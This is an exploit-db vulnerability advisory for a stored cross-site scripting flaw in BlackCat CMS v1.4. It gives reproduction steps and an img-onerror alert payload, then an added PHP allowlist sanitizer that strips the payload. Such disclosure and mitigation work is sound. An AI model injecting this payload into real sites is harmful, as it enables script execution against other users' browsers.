Blackcat Cms v1.4 – Stored XSS

  • Author: Mirabbas Ağalarov
    Date: 2023-07-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51604/
  • Exploit Title: Blackcat Cms v1.4 - Stored XSS
    Application: blackcat Cms
    Version: v1.4
    Bugs: Stored XSS
    Technology: PHP
    Vendor URL: https://blackcat-cms.org/
    Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
    Date found: 13.07.2023
    Author: Mirabbas Ağalarov
    Tested on: Linux 
    
    
    2. Technical Details & POC
    ========================================
    Steps:
    
    1. Log in to the account
    2. Go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
    3. Set as <img src=x onerror=alert(4)>
    4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
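
One way to neutralize the payload from step 3 before it is stored or rendered, shown as an added example that is not BlackCat CMS code or part of the original advisory. It assumes the edited field is meant to hold limited HTML; the allowlist, function names and sample input are constructed for illustration.

```php
<?php
// Added example, not BlackCat CMS code. The allowlist below is an assumption.
const ALLOWED_TAGS = [            // tag => attributes permitted on it
    'p' => [], 'br' => [], 'b' => [], 'i' => [], 'em' => [], 'strong' => [],
    'ul' => [], 'ol' => [], 'li' => [], 'h2' => [], 'h3' => [],
    'a' => ['href'], 'img' => ['src', 'alt'],
];
const URL_ATTRS = ['href', 'src'];
const SAFE_SCHEMES = ['http', 'https', 'mailto'];

function url_is_safe(string $value): bool
{
    // Browsers ignore control characters and whitespace inside a scheme.
    $v = preg_replace('/[\x00-\x20]+/', '', $value);
    if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $v, $m)) {
        return in_array(strtolower($m[1]), SAFE_SCHEMES, true);
    }
    return true; // no scheme: relative URL
}

function sanitize_fragment(string $html): string
{
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);   // tolerate malformed input
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    $root = $doc->getElementsByTagName('div')->item(0); // our wrapper

    // Snapshot the live node list before modifying the tree.
    foreach (iterator_to_array($root->getElementsByTagName('*')) as $el) {
        $tag = strtolower($el->nodeName);
        if (!array_key_exists($tag, ALLOWED_TAGS)) {   // script, iframe, svg, ...
            if ($el->parentNode) { $el->parentNode->removeChild($el); }
            continue;
        }
        foreach (iterator_to_array($el->attributes) as $attr) {
            $name = strtolower($attr->nodeName);
            $ok = in_array($name, ALLOWED_TAGS[$tag], true)
                && (!in_array($name, URL_ATTRS, true) || url_is_safe($attr->value));
            if (!$ok) { $el->removeAttributeNode($attr); } // drops onerror= etc.
        }
    }
    $out = '';
    foreach ($root->childNodes as $child) { $out .= $doc->saveHTML($child); }
    return $out;
}

// Constructed sample: the payload from step 3 inside ordinary page content.
echo sanitize_fragment('<p>Welcome</p><img src=x onerror=alert(4)>'), PHP_EOL;
```

In production, a maintained sanitizer such as HTML Purifier is the safer choice. Fields that should hold plain text only are better encoded with `htmlspecialchars()` at output.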